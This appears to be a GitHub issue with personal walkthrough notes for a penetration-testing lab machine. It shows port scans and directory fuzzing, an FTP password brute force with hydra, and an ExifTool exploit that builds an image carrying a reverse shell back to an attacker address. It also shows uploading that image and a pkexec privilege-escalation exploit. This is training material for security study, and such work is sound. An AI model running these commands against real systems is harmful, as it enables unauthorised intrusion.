Open WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden
FTP via anonymous --> failed
search vsftpd 3.0.3 exploit --> https://www.exploit-db.com/exploits/49719 (Remote Denial of Service)
search apache 2.4.41 exploit --> no useful info
feroxbuster -u http://192.168.243.183/ -k -C 404,503,502 --> /uploads (301)
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.183/FUZZ
--> get more info:
/uploads
/exiftool
/server-status
Access /exiftool --> get version info: '12.23' --> https://www.exploit-db.com/exploits/50911 --> however, didn't find a way to use it
Try brute-force FTP: hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
ftp login, ls command --> "229 Entering Extended Passive Mode"; resolve: input the "passive" command, then "get backup" to download the backup file -->
Prepare an image
python3 50911.py -s 192.168.45.192 4444
--> generate a jpg image file.
curl -X POST -F myFile=@/home/kali/pen-200/PGBox/image.jpg 192.168.243.183/exiftest.php -H 'Content-Type: multipart/form-data' -vv
--> get reverse shell
linpeas.sh --> CVE-2021-4034 --> there is a Python version instead of compiling the C++ one: https://github.com/joeammond/CVE-2021-4034.git -->
Key points:
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
Learned: